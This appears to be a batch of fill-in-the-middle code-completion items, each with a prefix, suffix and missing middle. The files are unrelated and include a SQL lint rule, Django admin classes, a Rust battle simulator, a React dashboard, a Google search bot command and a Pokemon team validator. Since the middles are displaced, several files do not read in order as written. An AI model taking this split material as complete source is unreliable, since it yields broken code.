    def _eval(self, segment, raw_stack, **kwargs):
        """WITH clause closing bracket should be aligned with WITH keyword.

        Look for a with clause and evaluate the position of closing brackets.
        """
        # We only trigger on start_bracket (open parenthesis)
        if segment.is_type("with_compound_statement"):
            raw_stack_buff = list(raw_stack)
            # Look for the with keyword
            for seg in segment.segments:
                if seg.name.lower() == "with":
                    seg_line_no = seg.pos_marker.line_no
                    break
            else:
                # This *could* happen if the with statement is unparsable,
                # in which case then the user will have to fix that first.
                if any(s.is_type("unparsable") for s in segment.segments):
                    return LintResult()
                # If it's parsable but we still didn't find a with, then
                # we should raise that.
                raise RuntimeError("Didn't find WITH keyword!")

            def indent_size_up_to(segs):
                # Measures the indent preceding the last newline in segs:
                # returns (size, raw string), expanding tabs to
                # tab_space_size spaces.
                seg_buff = []
                # Get any segments running up to the WITH
                for elem in reversed(segs):
                    if elem.is_type("newline"):
                        break
                    elif elem.is_meta:
                        continue
                    else:
                        seg_buff.append(elem)
                # reverse the indent if we have one
                if seg_buff:
                    seg_buff = list(reversed(seg_buff))
                indent_str = "".join(seg.raw for seg in seg_buff).replace(
                    "\t", " " * self.tab_space_size
                )
                indent_size = len(indent_str)
                return indent_size, indent_str

            balance = 0
            with_indent, with_indent_str = indent_size_up_to(raw_stack_buff)
            for seg in segment.iter_segments(expanding=["common_table_expression"]):
                if seg.name == "start_bracket":
                    balance += 1
                elif seg.name == "end_bracket":
                    balance -= 1
                    # balance == 0 means this bracket closes the CTE body.
                    if balance == 0:
                        closing_bracket_indent, _ = indent_size_up_to(raw_stack_buff)
                        indent_diff = closing_bracket_indent - with_indent
                        # Is indent of closing bracket not the same as
                        # indent of WITH keyword.
                        if seg.pos_marker.line_no == seg_line_no:
                            # Skip if it's the one-line version. That's ok
                            pass
                        elif indent_diff < 0:
                            # Under-indented: pad the bracket out to match.
                            return LintResult(
                                anchor=seg,
                                fixes=[
                                    LintFix(
                                        "create",
                                        seg,
                                        WhitespaceSegment(" " * (-indent_diff)),
                                    )
                                ],
                            )
                        elif indent_diff > 0:
                            # Is it all whitespace before the bracket on this line?
                            prev_segs_on_line = [
                                elem
                                for elem in segment.iter_segments(
                                    expanding=["common_table_expression"]
                                )
                                if elem.pos_marker.line_no == seg.pos_marker.line_no
                                and elem.pos_marker.line_pos < seg.pos_marker.line_pos
                            ]
                            if all(
                                elem.is_type("whitespace") for elem in prev_segs_on_line
                            ):
                                # We can move it back, it's all whitespace
                                fixes = [
                                    LintFix(
                                        "create",
                                        seg,
                                        [WhitespaceSegment(with_indent_str)],
                                    )
                                ] + [
                                    LintFix("delete", elem)
                                    for elem in prev_segs_on_line
                                ]
                            else:
                                # We have to move it to a newline
                                fixes = [
                                    LintFix(
                                        "create",
                                        seg,
                                        [
                                            NewlineSegment(),
                                            WhitespaceSegment(with_indent_str),
                                        ],
                                    )
                                ]
                            return LintResult(anchor=seg, fixes=fixes)
                else:
                    raw_stack_buff.append(seg)
            return LintResult()
admin.py | """
Admin views for ecommerce models
"""
from django.contrib import admin
from ecommerce.models import (
Coupon,
CouponAudit,
CouponInvoice,
CouponInvoiceAudit,
Line,
Order,
OrderAudit,
Receipt,
RedeemedCoupon,
RedeemedCouponAudit,
UserCoupon,
UserCouponAudit,
)
from micromasters.utils import get_field_names
class LineAdmin(admin.ModelAdmin):
    """Admin for Line: every field read-only, no add/delete from the admin."""
    model = Line
    readonly_fields = get_field_names(Line)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False
class OrderAdmin(admin.ModelAdmin):
    """Admin for Order: only status is editable; saves go through save_and_log."""
    model = Order
    list_filter = ('status',)
    list_display = ('id', 'user', 'status', 'created_at', 'course_key',)
    search_fields = (
        'user__username',
        'user__email',
    )
    # Everything except status is read-only.
    readonly_fields = [name for name in get_field_names(Order) if name != 'status']

    def course_key(self, obj):
        """
        Returns the course key of the first line associated with the order,
        or None if the order has no lines.
        (Fix: previously raised AttributeError on orders without lines.)
        """
        line = obj.line_set.first()
        return line.course_key if line is not None else None

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False

    def save_model(self, request, obj, form, change):
        """
        Saves object and logs change to object
        """
        obj.save_and_log(request.user)
class OrderAuditAdmin(admin.ModelAdmin):
    """Admin for OrderAudit: fully read-only, no add/delete."""
    model = OrderAudit
    readonly_fields = get_field_names(OrderAudit)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False


class ReceiptAdmin(admin.ModelAdmin):
    """Admin for Receipt: fully read-only, no add/delete."""
    model = Receipt
    readonly_fields = get_field_names(Receipt)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False


class CouponInvoiceAdmin(admin.ModelAdmin):
    """Admin for CouponInvoice: editable, but saves go through save_and_log."""
    model = CouponInvoice

    def save_model(self, request, obj, form, change):
        """
        Saves object and logs change to object
        """
        obj.save_and_log(request.user)


class CouponInvoiceAuditAdmin(admin.ModelAdmin):
    """Admin for CouponInvoiceAudit: fully read-only, no add/delete."""
    model = CouponInvoiceAudit
    readonly_fields = get_field_names(CouponInvoiceAudit)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False
class CouponAdmin(admin.ModelAdmin):
    """Admin for Coupon: searchable/filterable; saves go through save_and_log."""
    model = Coupon
    search_fields = (
        'coupon_code',
        'invoice__invoice_number',
        'invoice__description',
    )
    list_filter = [
        'invoice',
        'enabled',
        'coupon_type',
        'amount_type',
    ]

    def save_model(self, request, obj, form, change):
        """
        Saves object and logs change to object
        """
        obj.save_and_log(request.user)


class CouponAuditAdmin(admin.ModelAdmin):
    """Admin for CouponAudit: fully read-only, no add/delete."""
    model = CouponAudit
    readonly_fields = get_field_names(CouponAudit)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False


class RedeemedCouponAdmin(admin.ModelAdmin):
    """Admin for RedeemedCoupon: all fields read-only; saves go through save_and_log."""
    model = RedeemedCoupon
    readonly_fields = get_field_names(RedeemedCoupon)

    def save_model(self, request, obj, form, change):
        """
        Saves object and logs change to object
        """
        obj.save_and_log(request.user)


class RedeemedCouponAuditAdmin(admin.ModelAdmin):
    """Admin for RedeemedCouponAudit: fully read-only, no add/delete."""
    model = RedeemedCouponAudit
    readonly_fields = get_field_names(RedeemedCouponAudit)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False


class UserCouponAdmin(admin.ModelAdmin):
    """Admin for UserCoupon: all fields read-only; saves go through save_and_log."""
    model = UserCoupon
    readonly_fields = get_field_names(UserCoupon)

    def save_model(self, request, obj, form, change):
        """
        Saves object and logs change to object
        """
        obj.save_and_log(request.user)
class UserCouponAuditAdmin(admin.ModelAdmin):
    """Admin for UserCouponAudit: fully read-only, no add/delete.

    (Fix: the class name was missing at the fill-in hole; restored to
    UserCouponAuditAdmin, the name used by admin.site.register below.)
    """
    model = UserCouponAudit
    readonly_fields = get_field_names(UserCouponAudit)

    def has_add_permission(self, request):
        return False

    def has_delete_permission(self, request, obj=None):
        return False
# Register every ecommerce model with its corresponding admin class.
admin.site.register(CouponInvoice, CouponInvoiceAdmin)
admin.site.register(CouponInvoiceAudit, CouponInvoiceAuditAdmin)
admin.site.register(Coupon, CouponAdmin)
admin.site.register(CouponAudit, CouponAuditAdmin)
admin.site.register(Line, LineAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderAudit, OrderAuditAdmin)
admin.site.register(RedeemedCoupon, RedeemedCouponAdmin)
admin.site.register(RedeemedCouponAudit, RedeemedCouponAuditAdmin)
admin.site.register(Receipt, ReceiptAdmin)
admin.site.register(UserCoupon, UserCouponAdmin)
admin.site.register(UserCouponAudit, UserCouponAuditAdmin)
| UserCouponAuditAdmin |
main.rs | use splitmut::{SplitMut, SplitMutError};
use std::{
cmp::{min, Ordering},
collections::{HashMap, HashSet},
fmt,
};
/// Which side a group fights for, or `Stalemate` as a battle outcome.
#[derive(PartialEq)]
enum Side {
    Immune,
    Infection,
    Stalemate,
}

impl fmt::Display for Side {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        // Fix: Stalemate previously fell into the else branch and printed
        // "Infection"; an exhaustive match now names every variant.
        let name = match self {
            Side::Immune => "Immune",
            Side::Infection => "Infection",
            Side::Stalemate => "Stalemate",
        };
        write!(f, "{}", name)
    }
}
/// One group of identical units in the battle (AoC 2018 day 24 style).
struct Army {
    side: Side,
    // Number of living units; drops as damage is taken.
    units: u64,
    // Hit points per single unit.
    hitpoints: u64,
    // Damage types this group takes double damage from.
    weak_to: HashSet<String>,
    // Damage types this group takes no damage from.
    immune_to: HashSet<String>,
    // Per-unit attack damage.
    damage: u64,
    damage_type: String,
    // Higher initiative attacks first and breaks targeting ties.
    initiative: u64,
}
impl Army {
    /// Builds a group; `weak_to`/`immune_to` list damage types that double or
    /// negate incoming damage respectively.
    /// (Idiom cleanup: field-init shorthand for `damage_type`.)
    fn new(
        side: Side,
        units: u64,
        hitpoints: u64,
        weak_to: &[String],
        immune_to: &[String],
        damage: u64,
        damage_type: String,
        initiative: u64,
    ) -> Army {
        let mut a = Army {
            side,
            units,
            hitpoints,
            damage,
            initiative,
            damage_type,
            weak_to: HashSet::new(),
            immune_to: HashSet::new(),
        };
        for weak in weak_to {
            a.weak_to.insert(weak.to_string());
        }
        for immune in immune_to {
            a.immune_to.insert(immune.to_string());
        }
        a
    }

    /// True when this group fights for `side`.
    fn is_side(&self, side: &Side) -> bool {
        &self.side == side
    }

    /// Effective power: unit count times per-unit damage.
    fn effective_power(&self) -> u64 {
        self.units * self.damage
    }

    /// Sort key for the target-selection phase: effective power, then
    /// initiative (both compared descending by the caller).
    fn target_selection_order(&self) -> (u64, u64) {
        (self.effective_power(), self.initiative)
    }

    /// Damage this group would deal to `other`: zero if immune to our damage
    /// type, doubled if weak to it, otherwise effective power.
    fn would_damage(&self, other: &Army) -> u64 {
        if other.immune_to.contains(&self.damage_type) {
            0
        } else if other.weak_to.contains(&self.damage_type) {
            2 * self.damage * self.units
        } else {
            self.damage * self.units
        }
    }

    /// Orders candidate targets a, b: most would-be damage first, then
    /// highest effective power, then highest initiative — i.e. descending on
    /// every key. (Idiom cleanup: replaces a manual if-ladder with an
    /// equivalent `cmp().then()` chain.)
    fn targeting_cmp(&self, a: &Army, b: &Army) -> Ordering {
        self.would_damage(b)
            .cmp(&self.would_damage(a))
            .then(b.effective_power().cmp(&a.effective_power()))
            .then(b.initiative.cmp(&a.initiative))
    }

    /// Applies `amt` total damage; only whole units die. Returns the number
    /// of units destroyed (capped at the units remaining).
    fn take_damage(&mut self, amt: u64) -> u64 {
        let units_lost = min(amt / self.hitpoints, self.units);
        self.units -= units_lost;
        units_lost
    }
}
impl fmt::Display for Army {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result |
}
/// Simulates the full battle with the immune system's per-unit damage boosted
/// by `boost_amount`. Returns the winning Side, or Side::Stalemate when a
/// whole round passes with no casualties.
fn battle_with_boost(boost_amount: u64) -> Side {
    // Hard-coded puzzle input: immune-system groups get the boost.
    let mut armies = Vec::new();
    armies.push(Army::new(Side::Immune, 4400, 10384, &["slashing".to_string()], &[], 21 + boost_amount, "radiation".to_string(), 16));
    armies.push(Army::new(Side::Immune, 974, 9326, &["radiation".to_string()], &[], 86 + boost_amount, "cold".to_string(), 19));
    armies.push(Army::new(Side::Immune, 543, 2286, &[], &[], 34 + boost_amount, "cold".to_string(), 13));
    armies.push(Army::new(Side::Immune, 47, 4241, &["slashing".to_string(), "cold".to_string()], &["radiation".to_string()], 889 + boost_amount, "cold".to_string(), 10));
    armies.push(Army::new(Side::Immune, 5986, 4431, &[], &[], 6 + boost_amount, "cold".to_string(), 8));
    armies.push(Army::new(Side::Immune, 688, 1749, &[], &["slashing".to_string(), "radiation".to_string()], 23 + boost_amount, "cold".to_string(), 7));
    armies.push(Army::new(Side::Immune, 61, 1477, &[], &[], 235 + boost_amount, "fire".to_string(), 1));
    armies.push(Army::new(Side::Immune, 505, 9333, &["slashing".to_string(), "cold".to_string()], &[], 174 + boost_amount, "radiation".to_string(), 9));
    armies.push(Army::new(Side::Immune, 3745, 8367, &["cold".to_string()], &["fire".to_string(), "slashing".to_string(), "radiation".to_string()], 21 + boost_amount, "bludgeoning".to_string(), 3));
    armies.push(Army::new(Side::Immune, 111, 3482, &[], &[], 311 + boost_amount, "cold".to_string(), 15));
    armies.push(Army::new(Side::Infection, 2891, 32406, &["fire".to_string(), "bludgeoning".to_string()], &[], 22, "slashing".to_string(), 2));
    armies.push(Army::new(Side::Infection, 1698, 32906, &["radiation".to_string()], &[], 27, "fire".to_string(), 17));
    armies.push(Army::new(Side::Infection, 395, 37715, &[], &["fire".to_string()], 183, "cold".to_string(), 6));
    armies.push(Army::new(Side::Infection, 3560, 45025, &["radiation".to_string()], &["fire".to_string()], 20, "cold".to_string(), 14));
    armies.push(Army::new(Side::Infection, 2335, 15938, &["cold".to_string()], &[], 13, "slashing".to_string(), 11));
    armies.push(Army::new(Side::Infection, 992, 19604, &[], &[ "slashing".to_string(), "bludgeoning".to_string(), "radiation".to_string(), ], 38, "radiation".to_string(), 5));
    armies.push(Army::new(Side::Infection, 5159, 44419, &["fire".to_string()], &["slashing".to_string()], 13, "bludgeoning".to_string(), 4));
    armies.push(Army::new(Side::Infection, 2950, 6764, &["slashing".to_string()], &[], 4, "radiation".to_string(), 18));
    armies.push(Army::new(Side::Infection, 6131, 25384, &["slashing".to_string()], &["bludgeoning".to_string(), "cold".to_string()], 7, "cold".to_string(), 12));
    armies.push(Army::new(Side::Infection, 94, 29265, &["cold".to_string(), "bludgeoning".to_string()], &[], 588, "bludgeoning".to_string(), 20));
    //armies.push(Army::new(Side::Immune, 17, 5390, &["radiation".to_string(), "bludgeoning".to_string()], &[], 4507, "fire".to_string(), 2));
    //armies.push(Army::new(Side::Immune, 989, 1274, &["bludgeoning".to_string(), "slashing".to_string()], &["fire".to_string()], 25, "slashing".to_string(), 3));
    //armies.push(Army::new(Side::Infection, 801, 4706, &["radiation".to_string()], &[], 116, "bludgeoning".to_string(), 1));
    //armies.push(Army::new(Side::Infection, 4485, 2961, &["fire".to_string(), "cold".to_string()], &["radiation".to_string()], 12, "slashing".to_string(), 4));
    let mut round = 1;
    loop {
        //println!("### ROUND {} ###", round);
        // Target selection
        // Groups pick targets in descending (effective power, initiative) order.
        armies.sort_unstable_by(|x, y| y.target_selection_order().cmp(&x.target_selection_order()));
        let units_before = armies.iter().fold(0, |a, x| a + x.units);
        // A map from attackers to attackees, now that we won't reorder them
        let mut attacks = HashMap::new();
        let mut attacked_by = HashMap::new();
        for (idx, army) in armies.iter().enumerate() {
            // Candidates: enemy groups not already claimed by another attacker.
            let mut candidate_target_idx: Vec<usize> = (0..armies.len())
                .filter(|&x| !armies[x].is_side(&army.side))
                .filter(|x| !attacked_by.contains_key(x))
                .collect();
            candidate_target_idx
                .sort_unstable_by(|&a, &b| army.targeting_cmp(&armies[a], &armies[b]));
            if candidate_target_idx.is_empty()
                || army.would_damage(&armies[candidate_target_idx[0]]) == 0
            {
                // No target.
                // println!("Army {} has no valid targets, not attacking.", idx);
                continue;
            }
            attacks.insert(idx, candidate_target_idx[0]);
            attacked_by.insert(candidate_target_idx[0], idx);
        }
        // println!("### Attacking phase ###");
        // Attacking phase.
        // Groups attack in descending initiative order; get2_mut (splitmut)
        // borrows attacker and target mutably at once.
        let mut attack_order: Vec<usize> = (0..armies.len()).collect();
        attack_order.sort_unstable_by(|&a, &b| armies[b].initiative.cmp(&armies[a].initiative));
        for idx in attack_order {
            if attacks.contains_key(&idx) {
                let (attacking, attacked) = armies.get2_mut(idx, attacks[&idx]);
                let attacking = attacking.unwrap();
                let attacked = attacked.unwrap();
                let damage = attacking.would_damage(&attacked);
                let units_lost = attacked.take_damage(damage);
                //println!("Army {} attacks army {}, doing {} damage and destroying {} units", attacking, attacked, damage, units_lost);
            }
        }
        // Remove armies with no units left
        armies.retain(|x| x.units > 0);
        // If one side has no armies, we are done.
        let (immune, infect): (Vec<&Army>, Vec<&Army>) =
            armies.iter().partition(|x| x.is_side(&Side::Immune));
        if immune.is_empty() || infect.is_empty() {
            break;
        }
        let units_after = armies.iter().fold(0, |a, x| a + x.units);
        if units_before == units_after {
            // No units have died, and we are in a stalemate.
            return Side::Stalemate;
        }
        round += 1;
    }
    println!("These armies are left after the glorious battle:");
    let mut total_units = 0;
    for army in &armies {
        println!("{}", army);
        total_units += army.units;
    }
    println!("There are {} units in the winning army.", total_units);
    // All surviving groups share one side; report it via the first.
    armies.remove(0).side
}
/// Entry point: run one unboosted battle for part 1, then linearly search
/// for the smallest immune-system attack boost that makes the immune side win.
fn main() {
    battle_with_boost(0);
    let mut boost = 1;
    loop {
        println!("Boosting immune system by {}", boost);
        if battle_with_boost(boost) == Side::Immune {
            break;
        }
        boost += 1;
    }
}
| {
write!(
f,
"{} group has {} units each with {} hit points",
self.side, self.units, self.hitpoints
)?;
if !self.weak_to.is_empty() {
write!(
f,
" weak to {}",
self.weak_to
.iter()
.cloned()
.collect::<Vec<String>>()
.join(", ")
)?;
}
if !self.immune_to.is_empty() {
write!(
f,
" immune to {}",
self.immune_to
.iter()
.cloned()
.collect::<Vec<String>>()
.join(", ")
)?;
}
write!(
f,
" with an attack that does {} {} damage at initiative {}",
self.damage, self.damage_type, self.initiative
)?;
Ok(())
} |
dashboard.js | import React, { Component } from 'react';
import TabNav from './tabnav';
import NewsletterGrid from "./newsletter/newsletterGrid";
import RequestsGrid from "./requests/requestsGrid";
class Dashboard extends Component {
constructor(props) {
super(props);
this.state = { | component: <NewsletterGrid history={this.props.history}/>
},
{
title: 'Requests',
active: false,
component: <RequestsGrid history={this.props.history}/>
},
]
}
}
// Activate the tab whose title matches `title` and deactivate all others.
// Fixes from review: the original used Array.prototype.map purely for side
// effects, compared titles with loose `==`, and mutated objects stored in
// React state in place. This version builds a fresh tabs array (new objects)
// and uses strict equality, so setState receives genuinely new state.
handleTabChange = (title) => {
    const tabs = this.state.tabs.map(tab => ({
        ...tab,
        active: tab.title === title,
    }));
    this.setState({ tabs });
}
// Render the dashboard shell: a TabNav whose click events delegate to
// handleTabChange with the clicked tab's title.
// NOTE(review): the active tab's `component` is never rendered here —
// confirm whether TabNav renders it internally or this view is unfinished.
render() {
    return (
        <div className='dashboard'>
            <TabNav handleClick={(title) => this.handleTabChange(title)} tabs={this.state.tabs}/>
        </div>
    )
}
}
export default Dashboard; | tabs: [
{
title: 'Newsletter',
active: true, |
mod.rs | // Copyright 2020 Kazuyuki HIDA <[email protected]> | mod tca9555;
mod tca9554; | // All right reserved.
//
|
P2_characterCount.py | """Character count
This program counts how often each character appears in a string.
"""
def main():
|
if __name__ == '__main__':
main()
| message = 'It was a bright cold day in April, and the clocks were striking thirteen.'
"""str: Message to count characters."""
count = {}
"""dict: Characters as keys and counts as values."""
for character in message:
count.setdefault(character, 0)
count[character] = count[character] + 1
print(count) |
google.py | """
Google web search.
Run queries on Google and return results.
"""
import requests
from kochira import config
from kochira.service import Service, background, Config, coroutine
from kochira.userdata import UserData
service = Service(__name__, __doc__)
@service.config
class Config(Config):
    """Service configuration: credentials for the Google Custom Search JSON API."""

    api_key = config.Field(doc="Google API key.")
    cx = config.Field(doc="Custom search engine ID.")
@service.command(r"!g (?P<term>.+?)$")
@service.command(r"(?:search for|google) (?P<term>.+?)\??$", mention=True)
@background
def search(ctx, term):
    """
    Google.

    Search for the given terms on Google.
    """
    # A bounded timeout keeps a slow or unreachable API from hanging the
    # background worker forever (requests has no default timeout).
    r = requests.get(
        "https://www.googleapis.com/customsearch/v1",
        params={
            "key": ctx.config.api_key,
            "cx": ctx.config.cx,
            "q": term
        },
        timeout=10
    ).json()

    # The API omits "items" entirely when there are no hits.
    results = r.get("items", [])

    if not results:
        ctx.respond(ctx._("Couldn't find anything matching \"{term}\".").format(term=term))
        return

    total = len(results)

    # Only the first result is shown; num is therefore always 1.
    ctx.respond(ctx._("({num} of {total}) {title}: {url}").format(
        title=results[0]["title"],
        url=results[0]["link"],
        num=1,
        total=total
    ))
@service.command(r"!image (?P<term>.+?)$")
@service.command(r"image(?: for)? (?P<term>.+?)\??$", mention=True)
@background
def image(ctx, term):
"""
Image search.
Search for the given terms on Google.
"""
r = requests.get(
"https://www.googleapis.com/customsearch/v1",
params={
"key": ctx.config.api_key,
"cx": ctx.config.cx,
"searchType": "image",
"q": term
}
).json()
results = r.get("items", [])
if not results:
ctx.respond(ctx._("Couldn't find anything matching \"{term}\".").format(term=term))
return
| num=1,
total=total
)) | total = len(results)
ctx.respond(ctx._("({num} of {total}) {url}").format(
url=results[0]["link"], |
mod.rs | // Copyright 2021 Red Hat, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use semver::Version;
use serde::{Deserialize, Serialize};
pub(crate) const VERSION: Version = Version::new(3, 2, 0);
include!("schema.rs");
impl Default for Config { | ..Default::default()
},
passwd: None,
storage: None,
systemd: None,
}
}
} | fn default() -> Self {
Self {
ignition: Ignition {
version: Some("3.2.0".into()), |
main.go | package main
import (
"fmt"
"sync"
"time"
)
var wg sync.WaitGroup
// main starts foo and bar concurrently and blocks until both have
// signaled completion through the package-level WaitGroup.
func main() {
	wg.Add(2) // one count for each goroutine launched below
	go foo()
	go bar()
	wg.Wait()
}
// foo prints a counter 45 times at a 3ms cadence, then marks the
// package-level WaitGroup as done.
func foo() {
	// Deferring Done keeps the completion signal next to function entry and
	// guarantees it fires even if the body panics (idiomatic WaitGroup use).
	defer wg.Done()
	for i := 0; i < 45; i++ {
		fmt.Println("Foo:", i)
		time.Sleep(3 * time.Millisecond)
	}
}
func | () {
for i := 0; i < 45; i++ {
fmt.Println("Bar:", i)
time.Sleep(20 * time.Millisecond)
}
wg.Done()
}
| bar |
team-validator.ts | /**
* Team Validator
* Pokemon Showdown - http://pokemonshowdown.com/
*
* Handles team validation, and specifically learnset checking.
*
* @license MIT
*/
import {Dex, toID} from './dex';
import {Utils} from '../lib';
/**
* Describes a possible way to get a pokemon. Is not exhaustive!
* sourcesBefore covers all sources that do not have exclusive
* moves (like catching wild pokemon).
*
* First character is a generation number, 1-8.
* Second character is a source ID, one of:
*
* - E = egg, 3rd char+ is the father in gen 2-5, empty in gen 6-7
* because egg moves aren't restricted to fathers anymore
* - S = event, 3rd char+ is the index in .eventData
* - D = Dream World, only 5D is valid
* - V = Virtual Console or Let's Go transfer, only 7V/8V is valid
*
* Designed to match MoveSource where possible.
*/
export type PokemonSource = string;
/**
* Represents a set of possible ways to get a Pokémon with a given
* set.
*
* `new PokemonSources()` creates an empty set;
* `new PokemonSources(dex.gen)` allows all Pokemon.
*
* The set mainly stored as an Array `sources`, but for sets that
* could be sourced from anywhere (for instance, TM moves), we
* instead just set `sourcesBefore` to a number meaning "any
* source at or before this gen is possible."
*
* In other words, this variable represents the set of all
* sources in `sources`, union all sources at or before
* gen `sourcesBefore`.
*/
export class P | {
/**
* A set of specific possible PokemonSources; implemented as
* an Array rather than a Set for perf reasons.
*/
sources: PokemonSource[];
/**
* if nonzero: the set also contains all possible sources from
* this gen and earlier.
*/
sourcesBefore: number;
/**
* the set requires sources from this gen or later
* this should be unchanged from the format's minimum past gen
* (3 in modern games, 6 if pentagon is required, etc)
*/
sourcesAfter: number;
isHidden: boolean | null;
/**
* `limitedEggMoves` is a list of moves that can only be obtained from an
* egg with another father in gen 2-5. If there are multiple such moves,
* potential fathers need to be checked to see if they can actually
* learn the move combination in question.
*
* `null` = the current move is definitely not a limited egg move
*
* `undefined` = the current move may or may not be a limited egg move
*/
limitedEggMoves?: ID[] | null;
/**
* Some Pokemon evolve by having a move in their learnset (like Piloswine
* with Ancient Power). These can only carry three other moves from their
* prevo, because the fourth move must be the evo move. This restriction
* doesn't apply to gen 6+ eggs, which can get around the restriction with
* the relearner.
*/
moveEvoCarryCount: number;
babyOnly?: string;
sketchMove?: string;
hm?: string;
restrictiveMoves?: string[];
/** Obscure learn methods */
restrictedMove?: ID;
// Start with an empty set of concrete sources. Both generation bounds
// default to 0, meaning: no blanket "any source at or before gen N"
// allowance, and no minimum-generation requirement.
constructor(sourcesBefore = 0, sourcesAfter = 0) {
	this.sources = [];
	this.sourcesBefore = sourcesBefore;
	this.sourcesAfter = sourcesAfter;
	this.isHidden = null;
	// undefined = not yet determined whether a limited egg move is involved
	this.limitedEggMoves = undefined;
	this.moveEvoCarryCount = 0;
}
/** Number of possible sources; Infinity when a whole-gen range is allowed. */
size() {
	return this.sourcesBefore ? Infinity : this.sources.length;
}
// Record one concrete source. The push is skipped only when the new source
// equals the most recently added one — a cheap dedup for consecutive
// duplicates; the list may still contain non-adjacent repeats.
// limitedEggMove semantics: a truthy ID replaces the restriction list
// (unless it was locked to null); an explicit null locks the field to
// "definitely not a limited egg move".
add(source: PokemonSource, limitedEggMove?: ID | null) {
	if (this.sources[this.sources.length - 1] !== source) this.sources.push(source);
	if (limitedEggMove && this.limitedEggMoves !== null) {
		this.limitedEggMoves = [limitedEggMove];
	} else if (limitedEggMove === null) {
		this.limitedEggMoves = null;
	}
}
// Allow every source at or before sourceGen. Such blanket sources are not
// egg-move-restricted, so any egg-move limitation is cleared.
addGen(sourceGen: number) {
	this.sourcesBefore = Math.max(this.sourcesBefore, sourceGen);
	this.limitedEggMoves = null;
}
/**
 * Earliest generation any source in this set can come from.
 * Returns 0 when the set holds no concrete sources.
 */
minSourceGen() {
	if (this.sourcesBefore) return this.sourcesAfter || 1;
	// Each source string encodes its generation as the first character.
	const gens = this.sources.map(source => parseInt(source.charAt(0)));
	if (!gens.length) return 0;
	return Math.min(...gens);
}
/** Latest generation any source in this set can come from. */
maxSourceGen() {
	// Fold over the concrete sources, starting from the blanket bound.
	return this.sources.reduce(
		(max, source) => Math.max(max, parseInt(source.charAt(0))),
		this.sourcesBefore
	);
}
// Destructively intersect this source set with `other`: afterwards `this`
// contains only ways of obtaining the Pokemon that satisfy both sets.
// NOTE: `other` is also mutated (its sources array may be extended below)
// and must not be reused afterwards.
intersectWith(other: PokemonSources) {
	if (other.sourcesBefore || this.sourcesBefore) {
		// having sourcesBefore is the equivalent of having everything before that gen
		// in sources, so we fill the other array in preparation for intersection
		if (other.sourcesBefore > this.sourcesBefore) {
			for (const source of this.sources) {
				const sourceGen = parseInt(source.charAt(0));
				if (sourceGen <= other.sourcesBefore) {
					other.sources.push(source);
				}
			}
		} else if (this.sourcesBefore > other.sourcesBefore) {
			for (const source of other.sources) {
				const sourceGen = parseInt(source.charAt(0));
				if (sourceGen <= this.sourcesBefore) {
					this.sources.push(source);
				}
			}
		}
		this.sourcesBefore = Math.min(other.sourcesBefore, this.sourcesBefore);
	}
	// Set intersection of the explicit source lists (skipped when this set
	// has none, since sourcesBefore already captured the overlap above).
	if (this.sources.length) {
		if (other.sources.length) {
			const sourcesSet = new Set(other.sources);
			const intersectSources = this.sources.filter(source => sourcesSet.has(source));
			this.sources = intersectSources;
		} else {
			this.sources = [];
		}
	}
	// Two different restricted moves can never coexist: empty the set.
	if (other.restrictedMove && other.restrictedMove !== this.restrictedMove) {
		if (this.restrictedMove) {
			// incompatible
			this.sources = [];
			this.sourcesBefore = 0;
		} else {
			this.restrictedMove = other.restrictedMove;
		}
	}
	// Accumulate egg-move restrictions; fathers are checked later.
	if (other.limitedEggMoves) {
		if (!this.limitedEggMoves) {
			this.limitedEggMoves = other.limitedEggMoves;
		} else {
			this.limitedEggMoves.push(...other.limitedEggMoves);
		}
	}
	this.moveEvoCarryCount += other.moveEvoCarryCount;
	if (other.sourcesAfter > this.sourcesAfter) this.sourcesAfter = other.sourcesAfter;
	if (other.isHidden) this.isHidden = true;
}
}
export class TeamValidator {
readonly format: Format;
readonly dex: ModdedDex;
readonly gen: number;
readonly ruleTable: import('./dex-formats').RuleTable;
readonly minSourceGen: number;
readonly toID: (str: any) => ID;
// Build a validator bound to one format: resolves the format, picks the
// matching mod of the dex, and caches its rule table and generation.
constructor(format: string | Format, dex = Dex) {
	this.format = dex.getFormat(format);
	this.dex = dex.forFormat(this.format);
	this.gen = this.dex.gen;
	this.ruleTable = this.dex.getRuleTable(this.format);
	// minSourceGen rule stores [value]; default to gen 1 when unset.
	this.minSourceGen = this.ruleTable.minSourceGen ?
		this.ruleTable.minSourceGen[0] : 1;
	this.toID = toID;
}
// Validate a whole team. A format-supplied validateTeam hook, when present,
// fully replaces the standard pipeline; otherwise defer to baseValidateTeam.
// Returns a list of human-readable problems, or null when the team is legal.
validateTeam(
	team: PokemonSet[] | null,
	options: {
		removeNicknames?: boolean,
		skipSets?: {[name: string]: {[key: string]: boolean}},
	} = {}
): string[] | null {
	if (team && this.format.validateTeam) {
		return this.format.validateTeam.call(this, team, options) || null;
	}
	return this.baseValidateTeam(team, options);
}
// Standard team-level validation: team size, per-set validation (via
// validateSet), Let's Go starter exclusivity, gen 3 Deoxys forme
// consistency, complex team bans, and rule/format onValidateTeam hooks.
// Mutates sets when options.removeNicknames is on. Returns problems or null.
baseValidateTeam(
	team: PokemonSet[] | null,
	options: {
		removeNicknames?: boolean,
		skipSets?: {[name: string]: {[key: string]: boolean}},
	} = {}
): string[] | null {
	const format = this.format;
	const dex = this.dex;

	let problems: string[] = [];
	const ruleTable = this.ruleTable;
	// Formats with a generated team (e.g. Random Battle) reject user teams.
	if (format.team) {
		if (team) {
			return [
